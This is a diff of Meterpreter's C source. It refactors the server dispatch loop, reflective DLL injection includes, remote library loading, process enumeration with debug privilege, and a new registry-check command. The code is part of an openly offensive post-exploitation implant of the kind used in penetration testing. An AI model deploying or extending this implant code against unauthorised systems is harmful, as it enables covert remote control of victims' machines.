@ -883,7 +883,7 @@ DWORD request_sys_process_get_processes( Remote * remote, Packet * packet )
priv.PrivilegeCount = 1;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if( LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid ) )
AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL );
@ -916,7 +916,7 @@ DWORD request_sys_process_get_processes( Remote * remote, Packet * packet )
packet_transmit_response( result, remote, response );
}
#endif
return result;
}
@ -948,10 +948,10 @@ DWORD request_sys_process_get_info(Remote *remote, Packet *packet)
Packet *response = packet_create_response(packet);
#ifdef _WIN32
BOOL (WINAPI *enumProcessModules)(HANDLE p, HMODULE *mod, DWORD cb,
#ifdef _WIN32
BOOL (WINAPI *enumProcessModules)(HANDLE p, HMODULE *mod, DWORD cb,
LPDWORD needed);
DWORD (WINAPI *getModuleBaseName)(HANDLE p, HMODULE mod, LPTSTR base,
DWORD (WINAPI *getModuleBaseName)(HANDLE p, HMODULE mod, LPTSTR base,
DWORD baseSize);
DWORD (WINAPI *getModuleFileNameEx)(HANDLE p, HMODULE mod, LPTSTR path,
DWORD pathSize);
@ -989,11 +989,11 @@ DWORD request_sys_process_get_info(Remote *remote, Packet *packet)
}
// Try to resolve the necessary symbols
if ((!((LPVOID)enumProcessModules =
if ((!((LPVOID)enumProcessModules =
(LPVOID)GetProcAddress(psapi, "EnumProcessModules"))) ||
(!((LPVOID)getModuleBaseName =
(!((LPVOID)getModuleBaseName =
(LPVOID)GetProcAddress(psapi, "GetModuleBaseNameA"))) ||
(!((LPVOID)getModuleFileNameEx =
(!((LPVOID)getModuleFileNameEx =
(LPVOID)GetProcAddress(psapi, "GetModuleFileNameExA"))))
{
result = GetLastError();
@ -1067,7 +1067,7 @@ DWORD process_channel_read(Channel *channel, Packet *request,
* Writes data from the remote half of the channel to the process's standard
* input handle
*/
DWORD process_channel_write( Channel *channel, Packet *request,
DWORD process_channel_write( Channel *channel, Packet *request,
LPVOID context, LPVOID buffer, DWORD bufferSize, LPDWORD bytesWritten )
{
ProcessChannelContext *ctx = (ProcessChannelContext *)context;
@ -1101,10 +1101,6 @@ DWORD process_channel_close( Channel *channel, Packet *request, LPVOID context )
scheduler_signal_waitable( ctx->pStdout, Stop );
} else {
#ifdef _WIN32
// Note: We dont close the handle ctx->pStdout as this will introduce a synchronization
// problem with the channels interactive thread, specifically the call to WaitForMultipleObjects
// will have undefined behaviour. The interactive thread will close the handle instead.
CloseHandle( ctx->pStdin );
CloseHandle( ctx->pStdout );
#else
@ -1137,7 +1133,7 @@ DWORD process_channel_interact_destroy( HANDLE waitable, LPVOID entryContext, LP
close( ctx->pStdin );
close( ctx->pStdout );
dprintf( "[PROCESS] pid %u", ctx->pProcess );
dprintf( "[PROCESS] pid %u", ctx->pProcess );
if( ctx->pProcess ) {
dprintf( "[PROCESS] terminating pid %u", ctx->pProcess );
kill( (pid_t)ctx->pProcess, 9 );
@ -1181,13 +1177,13 @@ DWORD process_channel_interact_notify(Remote *remote, LPVOID entryContext, LPVOI
#else
bytesRead = read ( ctx->pStdout, buffer, sizeof(buffer) - 1);
if ( bytesRead > 0 )
if ( bytesRead > 0 )
{
dprintf("bytesRead: %d, errno: %d", bytesRead, errno);
result = channel_write ( channel, remote, NULL, 0, buffer, bytesRead, NULL );
}
}
if(bytesRead == -1) {
if(errno == EINTR || errno == EWOULDBLOCK || errno == EAGAIN) {
@ -1257,7 +1253,7 @@ DWORD request_sys_process_wait(Remote *remote, Packet *packet)
result = ERROR_SUCCESS;
}
#else
if( ! waitpid(handle, NULL, WNOHANG))
if( ! waitpid(handle, NULL, WNOHANG))
{
result = ERROR_SUCCESS;
}

45
c/meterpreter/source/extensions/stdapi/server/sys/registry/registry.c
View File

@ -3,6 +3,51 @@
DWORD request_registry_create_key(Remote *remote, Packet *packet);
/*!
* @brief Check to see if a registry key exists.
* @param remote Pointer to the \c Remote instance.
* @param packet Pointer to the request \c Packet instance.
* @returns Always returns \c ERROR_SUCCESS.
*/
DWORD request_registry_check_key_exists(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
LPCTSTR baseKey = NULL;
HKEY rootKey = NULL;
HKEY resultKey = NULL;
BOOL exists = FALSE;
DWORD result;
rootKey = (HKEY)packet_get_tlv_value_uint(packet, TLV_TYPE_ROOT_KEY);
baseKey = packet_get_tlv_value_string(packet, TLV_TYPE_BASE_KEY);
if (rootKey && baseKey)
{
result = RegOpenKeyA(rootKey, baseKey, &resultKey);
if (result == ERROR_SUCCESS)
{
dprintf("[REG] Key found");
RegCloseKey(resultKey);
exists = TRUE;
}
dprintf("[REG] Key exists? %s", exists ? "TRUE" : "FALSE");
packet_add_tlv_bool(response, TLV_TYPE_BOOL, exists);
result = ERROR_SUCCESS;
}
else
{
dprintf("[REG] Invalid parameter");
result = ERROR_INVALID_PARAMETER;
}
dprintf("[REG] Returning result: %u %x", result, result);
packet_transmit_response(result, remote, response);
dprintf("[REG] done.");
return ERROR_SUCCESS;
}
/*
* Opens a registry key and returns the associated HKEY to the caller if the
* operation succeeds. Right now this is just a wrapper around create_key

1
c/meterpreter/source/extensions/stdapi/server/sys/registry/registry.h
View File

@ -17,5 +17,6 @@ DWORD request_registry_enum_value(Remote *remote, Packet *packet);
DWORD request_registry_delete_value(Remote *remote, Packet *packet);
DWORD request_registry_load_key(Remote *remote, Packet *packet);
DWORD request_registry_unload_key(Remote *remote, Packet *packet);
DWORD request_registry_check_key_exists(Remote *remote, Packet *packet);
#endif

9
c/meterpreter/source/extensions/stdapi/stdapi.h
View File

@ -308,6 +308,15 @@
TLV_META_TYPE_STRING, \
TLV_TYPE_EXTENSION_STDAPI, \
1044)
// Environment stuff
/*! @brief TLV that maps to an environment variable name. */
#define TLV_TYPE_ENV_VARIABLE MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 1100)
/*! @brief TLV that maps to an environment value. */
#define TLV_TYPE_ENV_VALUE MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 1101)
/*! @brief TLV that groups a variable with a value. */
#define TLV_TYPE_ENV_GROUP MAKE_CUSTOM_TLV(TLV_META_TYPE_GROUP, TLV_TYPE_EXTENSION_STDAPI, 1102)
// Net
#define TLV_TYPE_HOST_NAME \
MAKE_CUSTOM_TLV( \

2
c/meterpreter/source/screenshot/screenshot.c
View File

@ -8,7 +8,7 @@
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// include the Reflectiveloader() function
#include "../ReflectiveDLLInjection/ReflectiveLoader.c"
#include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
/*
* Send a buffer to a named pipe server.

6
c/meterpreter/source/server/metsrv.h
View File

@ -24,9 +24,9 @@
#include "libloader.h"
#ifdef _WIN32
#include "../ReflectiveDLLInjection/GetProcAddressR.h"
#include "../ReflectiveDLLInjection/LoadLibraryR.h"
#include "../ReflectiveDLLInjection/ReflectiveLoader.h"
#include "../ReflectiveDLLInjection/inject/src/GetProcAddressR.h"
#include "../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
#include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.h"
#endif
DWORD server_setup(SOCKET fd);

54
c/meterpreter/source/server/posix/remote_dispatch.c
View File

@ -1,10 +1,9 @@
#include <dlfcn.h>
#include "metsrv.h"
extern Command *extension_commands;
extern Command *extensionCommands;
DWORD
request_core_loadlib(Remote *remote, Packet *packet)
DWORD request_core_loadlib(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
DWORD res = ERROR_SUCCESS;
@ -14,24 +13,24 @@ request_core_loadlib(Remote *remote, Packet *packet)
PCHAR targetPath;
int local_error = 0;
Command *command;
Command *first = extension_commands;
Command *first = extensionCommands;
do
{
Tlv dataTlv;
libraryPath = packet_get_tlv_value_string(packet,
TLV_TYPE_LIBRARY_PATH);
flags = packet_get_tlv_value_uint(packet,
TLV_TYPE_FLAGS);
libraryPath = packet_get_tlv_value_string(packet, TLV_TYPE_LIBRARY_PATH);
flags = packet_get_tlv_value_uint(packet, TLV_TYPE_FLAGS);
// Invalid library path?
if (!libraryPath) {
if (!libraryPath)
{
res = ERROR_INVALID_PARAMETER;
break;
}
if(flags & LOAD_LIBRARY_FLAG_LOCAL) {
if (flags & LOAD_LIBRARY_FLAG_LOCAL)
{
// i'd be surprised if we could load
// libraries off the remote system without breaking severely.
res = ERROR_NOT_SUPPORTED;
@ -40,43 +39,50 @@ request_core_loadlib(Remote *remote, Packet *packet)
// Get the library's file contents
if ((packet_get_tlv(packet, TLV_TYPE_DATA,
&dataTlv) != ERROR_SUCCESS) ||
(!(targetPath = packet_get_tlv_value_string(packet,
TLV_TYPE_TARGET_PATH)))) {
&dataTlv) != ERROR_SUCCESS) ||
(!(targetPath = packet_get_tlv_value_string(packet,
TLV_TYPE_TARGET_PATH))))
{
res = ERROR_INVALID_PARAMETER;
break;
}
dprintf("targetPath: %s", targetPath);
library = dlopenbuf(targetPath, dataTlv.buffer, dataTlv.header.length );
library = dlopenbuf(targetPath, dataTlv.buffer, dataTlv.header.length);
dprintf("dlopenbuf(%s): %08x / %s", targetPath, library, dlerror());
if(! library) {
if (!library)
{
res = ERROR_NOT_FOUND;
break;
}
// If this library is supposed to be an extension library, try to
// call its Init routine
if (flags & LOAD_LIBRARY_FLAG_EXTENSION) {
DWORD (*init)(Remote *remote);
if (flags & LOAD_LIBRARY_FLAG_EXTENSION)
{
DWORD(*init)(Remote *remote);
init = dlsym(library, "InitServerExtension" );
init = dlsym(library, "InitServerExtension");
// Call the init routine in the library
if( init ) {
if (init)
{
dprintf("calling InitServerExtension");
res = init(remote);
}
if (response) {
for (command = extension_commands; command != first; command = command->next) {
if (response)
{
for (command = extensionCommands; command != first; command = command->next)
{
packet_add_tlv_string(response, TLV_TYPE_METHOD, command->method);
}
}
}
} while (0);
if (response) {
if (response)
{
packet_add_tlv_uint(response, TLV_TYPE_RESULT, res);
packet_transmit(remote, response, NULL);
}

126
c/meterpreter/source/server/server_setup.c
View File

@ -1,3 +1,6 @@
/*!
* @file server_setup.c
*/
#include "metsrv.h"
#include "../../common/common.h"
@ -19,7 +22,7 @@ int global_comm_timeout = 0xaf79257f;
// NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor
// include the Reflectiveloader() function
#include "../ReflectiveDLLInjection/ReflectiveLoader.c"
#include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
int exceptionfilter(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
@ -43,33 +46,37 @@ const unsigned int hAppInstance = 0x504b5320; // 'PKS '
#define PREPEND_INFO "### Info : "
#define PREPEND_WARN "### Warn : "
/*
* This thread is the main server thread which we use to syncronize a gracefull
* shutdown of the server during process migration.
*/
THREAD * serverThread = NULL;
/*! @brief This thread is the main server thread. */
static THREAD * serverThread = NULL;
/*
* An array of locks for use by OpenSSL.
*/
/*! @brief An array of locks for use by OpenSSL. */
static LOCK ** ssl_locks = NULL;
/*
* A callback function used by OpenSSL to leverage native system locks.
/*!
* @brief A callback function used by OpenSSL to leverage native system locks.
* @param mode The lock mode to set.
* @param type The lock type to operate on.
* @param file Unused.
* @param line Unused.
*/
static VOID server_locking_callback( int mode, int type, const char * file, int line )
static VOID server_locking_callback(int mode, int type, const char * file, int line)
{
if( mode & CRYPTO_LOCK )
lock_acquire( ssl_locks[type] );
if (mode & CRYPTO_LOCK)
{
lock_acquire(ssl_locks[type]);
}
else
lock_release( ssl_locks[type] );
{
lock_release(ssl_locks[type]);
}
}
/*
* A callback function used by OpenSSL to get the current threads id.
* While not needed on windows this must be used for posix meterpreter.
/*!
* @brief A callback function used by OpenSSL to get the current threads id.
* @returns The current thread ID.
* @remarks While not needed on windows this must be used for posix meterpreter.
*/
static DWORD server_threadid_callback( VOID )
static DWORD server_threadid_callback(VOID)
{
#ifdef _WIN32
return GetCurrentThreadId();
@ -81,7 +88,7 @@ static DWORD server_threadid_callback( VOID )
/*
* Callback function for dynamic lock creation for OpenSSL.
*/
static struct CRYPTO_dynlock_value * server_dynamiclock_create( const char * file, int line )
static struct CRYPTO_dynlock_value * server_dynamiclock_create(const char * file, int line)
{
return (struct CRYPTO_dynlock_value *)lock_create();
}
@ -93,10 +100,14 @@ static void server_dynamiclock_lock( int mode, struct CRYPTO_dynlock_value * l,
{
LOCK * lock = (LOCK *)l;
if( mode & CRYPTO_LOCK )
lock_acquire( lock );
if (mode & CRYPTO_LOCK)
{
lock_acquire(lock);
}
else
lock_release( lock );
{
lock_release(lock);
}
}
/*
@ -322,59 +333,62 @@ static BOOL server_negotiate_ssl(Remote *remote)
return success;
}
/*
* The servers main dispatch loop for incoming requests using SSL over TCP
/*!
* @brief The servers main dispatch loop for incoming requests using SSL over TCP
* @param remote Pointer to the remote endpoint for this server connection.
* @returns Indication of success or failure.
*/
static DWORD server_dispatch( Remote * remote )
static DWORD server_dispatch(Remote * remote)
{
LONG result = ERROR_SUCCESS;
BOOL running = TRUE;
LONG result = ERROR_SUCCESS;
Packet * packet = NULL;
THREAD * cpt = NULL;
THREAD * cpt = NULL;
dprintf( "[DISPATCH] entering server_dispatch( 0x%08X )", remote );
dprintf("[DISPATCH] entering server_dispatch( 0x%08X )", remote);
// Bring up the scheduler subsystem.
result = scheduler_initialize( remote );
if( result != ERROR_SUCCESS )
return result;
while( TRUE )
result = scheduler_initialize(remote);
if (result != ERROR_SUCCESS)
{
if( event_poll( serverThread->sigterm, 0 ) )
return result;
}
while (running)
{
if (event_poll(serverThread->sigterm, 0))
{
dprintf( "[DISPATCH] server dispatch thread signaled to terminate..." );
dprintf("[DISPATCH] server dispatch thread signaled to terminate...");
break;
}
result = server_socket_poll( remote, 100 );
if( result > 0 )
result = server_socket_poll(remote, 100);
if (result > 0)
{
result = packet_receive( remote, &packet );
if( result != ERROR_SUCCESS ) {
dprintf( "[DISPATCH] packet_receive returned %d, exiting dispatcher...", result );
result = packet_receive(remote, &packet);
if (result != ERROR_SUCCESS)
{
dprintf("[DISPATCH] packet_receive returned %d, exiting dispatcher...", result);
break;
}
if( !command_handle( remote, packet ) )
{
dprintf( "[DISPATCH] command_process indicated server stop. Exiting." );
break;
}
running = command_handle(remote, packet);
dprintf("[DISPATCH] command_process result: %s", (running ? "continue" : "stop"));
}
else if( result < 0 )
else if (result < 0)
{
dprintf( "[DISPATCH] server_socket_poll returned %d, exiting dispatcher...", result );
dprintf("[DISPATCH] server_socket_poll returned %d, exiting dispatcher...", result);
break;
}
}
dprintf( "[DISPATCH] calling scheduler_destroy..." );
dprintf("[DISPATCH] calling scheduler_destroy...");
scheduler_destroy();
dprintf( "[DISPATCH] calling command_join_threads..." );
dprintf("[DISPATCH] calling command_join_threads...");
command_join_threads();
dprintf( "[DISPATCH] leaving server_dispatch." );
dprintf("[DISPATCH] leaving server_dispatch.");
return result;
}
@ -385,6 +399,7 @@ static DWORD server_dispatch( Remote * remote )
*/
static DWORD server_dispatch_http_wininet( Remote * remote )
{
BOOL running = TRUE;
LONG result = ERROR_SUCCESS;
Packet * packet = NULL;
THREAD * cpt = NULL;
@ -455,7 +470,7 @@ static DWORD server_dispatch_http_wininet( Remote * remote )
if( result != ERROR_SUCCESS )
return result;
while( TRUE )
while(running)
{
if (remote->comm_timeout != 0 && remote->comm_last_packet + remote->comm_timeout < current_unix_timestamp()) {
dprintf("[DISPATCH] Shutting down server due to communication timeout");
@ -501,11 +516,8 @@ static DWORD server_dispatch_http_wininet( Remote * remote )
dprintf("[DISPATCH] Returned result: %d", result);
if( !command_handle( remote, packet ) )
{
dprintf( "[DISPATCH] command_process indicated server stop. Exiting." );
break;
}
running = command_handle(remote, packet);
dprintf("[DISPATCH] command_process result: %s", (running ? "continue" : "stop"));
}
// Close WinInet handles

62
c/meterpreter/source/server/win/remote_dispatch.c
View File

@ -6,7 +6,7 @@ extern HINSTANCE hAppInstance;
// see remote_dispatch_common.c
extern LIST * extension_list;
// see common/base.c
extern Command *extension_commands;
extern Command *extensionCommands;
DWORD request_core_loadlib(Remote *remote, Packet *packet)
{
@ -17,15 +17,13 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
DWORD flags = 0;
BOOL bLibLoadedReflectivly = FALSE;
Command *first = extension_commands;
Command *first = extensionCommands;
Command *command;
do
{
libraryPath = packet_get_tlv_value_string(packet,
TLV_TYPE_LIBRARY_PATH);
flags = packet_get_tlv_value_uint(packet,
TLV_TYPE_FLAGS);
libraryPath = packet_get_tlv_value_string(packet, TLV_TYPE_LIBRARY_PATH);
flags = packet_get_tlv_value_uint(packet, TLV_TYPE_FLAGS);
// Invalid library path?
if (!libraryPath)
@ -42,9 +40,9 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
// Get the library's file contents
if ((packet_get_tlv(packet, TLV_TYPE_DATA,
&dataTlv) != ERROR_SUCCESS) ||
(!(targetPath = packet_get_tlv_value_string(packet,
TLV_TYPE_TARGET_PATH))))
&dataTlv) != ERROR_SUCCESS) ||
(!(targetPath = packet_get_tlv_value_string(packet,
TLV_TYPE_TARGET_PATH))))
{
res = ERROR_INVALID_PARAMETER;
break;
@ -54,13 +52,13 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
if (!(flags & LOAD_LIBRARY_FLAG_ON_DISK))
{
// try to load the library via its reflective loader...
library = LoadLibraryR( dataTlv.buffer, dataTlv.header.length );
if( library == NULL )
library = LoadLibraryR(dataTlv.buffer, dataTlv.header.length);
if (library == NULL)
{
// if that fails, presumably besause the library doesn't support
// reflective injection, we default to using libloader...
library = libloader_load_library( targetPath,
dataTlv.buffer, dataTlv.header.length );
library = libloader_load_library(targetPath,
dataTlv.buffer, dataTlv.header.length);
}
else
{
@ -72,8 +70,8 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
else
{
// Otherwise, save the library buffer to disk
res = buffer_to_file(targetPath, dataTlv.buffer,
dataTlv.header.length);
res = buffer_to_file(targetPath, dataTlv.buffer,
dataTlv.header.length);
}
// Override the library path
@ -94,21 +92,21 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
// call its Init routine
if ((flags & LOAD_LIBRARY_FLAG_EXTENSION) && (library))
{
EXTENSION * extension = (EXTENSION *)malloc( sizeof(EXTENSION) );
if( extension )
EXTENSION * extension = (EXTENSION *)malloc(sizeof(EXTENSION));
if (extension)
{
extension->library = library;
// if the library was loaded via its reflective loader we must use GetProcAddressR()
if( bLibLoadedReflectivly )
if (bLibLoadedReflectivly)
{
extension->init = (PSRVINIT)GetProcAddressR( extension->library, "InitServerExtension" );
extension->deinit = (PSRVDEINIT)GetProcAddressR( extension->library, "DeinitServerExtension" );
extension->init = (PSRVINIT)GetProcAddressR(extension->library, "InitServerExtension");
extension->deinit = (PSRVDEINIT)GetProcAddressR(extension->library, "DeinitServerExtension");
}
else
{
extension->init = (PSRVINIT)GetProcAddress( extension->library, "InitServerExtension" );
extension->deinit = (PSRVDEINIT)GetProcAddress( extension->library, "DeinitServerExtension" );
extension->init = (PSRVINIT)GetProcAddress(extension->library, "InitServerExtension");
extension->deinit = (PSRVDEINIT)GetProcAddress(extension->library, "DeinitServerExtension");
}
// patch in the metsrv.dll's HMODULE handle, used by the server extensions for delay loading
@ -117,20 +115,26 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
remote->hMetSrv = hAppInstance;
// Call the init routine in the library
if( extension->init )
if (extension->init)
{
dprintf("[SERVER] Calling init()...");
res = extension->init( remote );
res = extension->init(remote);
if( res == ERROR_SUCCESS )
list_push( extension_list, extension );
if (res == ERROR_SUCCESS)
{
list_push(extension_list, extension);
}
else
free( extension );
{
free(extension);
}
}
dprintf("[SERVER] Called init()...");
if (response) {
for (command = extension_commands; command != first; command = command->next) {
if (response)
{
for (command = extensionCommands; command != first; command = command->next)
{
packet_add_tlv_string(response, TLV_TYPE_METHOD, command->method);
}
}

76
c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj
View File

@ -115,46 +115,10 @@
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<OutDir Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">$(SolutionDir)$(Configuration)\</OutDir>
<OutDir Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'">$(SolutionDir)$(Configuration)\</OutDir>
<IntDir Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">$(Configuration)\</IntDir>
<IntDir Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'">$(Configuration)\</IntDir>
<OutDir Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">$(SolutionDir)$(Configuration)\$(Platform)\</OutDir>
<OutDir Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'">$(SolutionDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">$(Configuration)\$(Platform)\</IntDir>
<IntDir Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'">$(Configuration)\$(Platform)\</IntDir>
<OutDir Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">$(SolutionDir)$(Configuration)\$(Platform)\</OutDir>
<OutDir Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">$(SolutionDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">$(Configuration)\$(Platform)\</IntDir>
<IntDir Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">$(Configuration)\$(Platform)\</IntDir>
<OutDir Condition="'$(Configuration)|$(Platform)'=='Release|x64'">$(SolutionDir)$(Configuration)\$(Platform)\</OutDir>
<OutDir Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">$(SolutionDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir Condition="'$(Configuration)|$(Platform)'=='Release|x64'">$(Configuration)\$(Platform)\</IntDir>
<IntDir Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">$(Configuration)\$(Platform)\</IntDir>
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" />
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" />
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" />
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|x64'" />
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'" />
<OutDir>$(SolutionDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules />
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
@ -166,6 +130,7 @@
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\ReflectiveDLLInjection\inject\src;..\..\source\ReflectiveDLLInjection\dll\src;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
</ClCompile>
<Lib>
<IgnoreSpecificDefaultLibraries>libcmtd;%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
@ -186,6 +151,7 @@
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\ReflectiveDLLInjection\inject\src;..\..\source\ReflectiveDLLInjection\dll\src;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
</ClCompile>
<Lib>
<IgnoreSpecificDefaultLibraries>libcmtd;%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
@ -210,6 +176,7 @@
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\ReflectiveDLLInjection\inject\src;..\..\source\ReflectiveDLLInjection\dll\src;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
</ClCompile>
<Lib>
<IgnoreSpecificDefaultLibraries>libcmtd;%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
@ -234,6 +201,7 @@
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\ReflectiveDLLInjection\inject\src;..\..\source\ReflectiveDLLInjection\dll\src;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
</ClCompile>
<Lib>
<IgnoreSpecificDefaultLibraries>libcmtd;%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
@ -249,7 +217,7 @@
<Optimization>MinSpace</Optimization>
<IntrinsicFunctions>false</IntrinsicFunctions>
<WholeProgramOptimization>false</WholeProgramOptimization>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\ReflectiveDLLInjection\inject\src;..\..\source\ReflectiveDLLInjection\dll\src;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
@ -276,7 +244,7 @@
<Optimization>MinSpace</Optimization>
<IntrinsicFunctions>false</IntrinsicFunctions>
<WholeProgramOptimization>false</WholeProgramOptimization>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\ReflectiveDLLInjection\inject\src;..\..\source\ReflectiveDLLInjection\dll\src;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
@ -306,7 +274,7 @@
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<WholeProgramOptimization>false</WholeProgramOptimization>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\ReflectiveDLLInjection\inject\src;..\..\source\ReflectiveDLLInjection\dll\src;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN64;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
@ -332,7 +300,7 @@
<Optimization>MaxSpeed</Optimization>
